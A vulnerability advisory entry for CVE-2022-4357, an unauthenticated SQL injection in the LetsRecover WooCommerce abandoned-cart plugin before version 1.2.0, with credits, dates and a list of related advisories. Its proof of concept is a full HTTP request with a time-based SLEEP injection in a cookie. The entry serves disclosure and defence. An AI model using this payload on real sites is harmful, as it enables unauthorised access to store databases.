LetsRecover < 1.2.0 – Unauthenticated SQLi | CVE 2022-4357 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

GET /checkout/order-received/30/?key=wc_order_Kwss5kjkrhgKG HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/checkout/
Cookie: wplrp_subscriber_id=5 AND (SELECT 7741 FROM (SELECT(SLEEP(5)))hlAf);
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

Affects Plugins

letsrecover-woocommerce-abandoned-cart

Fixed in 1.2.0

References

CVE

URL

https://bulletin.iese.de/post/letsrecover-woocommerce-abandoned-cart_1-1-0_1

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Krohmer, Kunal Sharma

Submitter

Daniel Krohmer

Submitter website

https://iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

4d1c0886-11f7-494f-b175-691253f46626

Timeline

Publicly Published

2022-12-12 (about 3 years ago)

Added

2022-12-12 (about 3 years ago)

Last Updated

-0001-11-30 (about 2026 years ago)

Other

Published

Title

Published

2024-05-01

Title

WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting < 1.13.2 - Authenticated (AccountingManager+) SQL Injection

Published

2022-10-03

Title

Blog2Social < 6.9.10 - Subscriber+ SQLi

Published

2015-09-05

Title

WP Limit Login Attempts <= 2.0.0 - Unauthenticated SQL Injection

Published

2023-02-27

Title

WP Meta SEO < 4.5.3 - Subscriber+ SQLi

Published

2021-10-18

Title

Email Log < 2.4.7 - Admin+ SQL Injection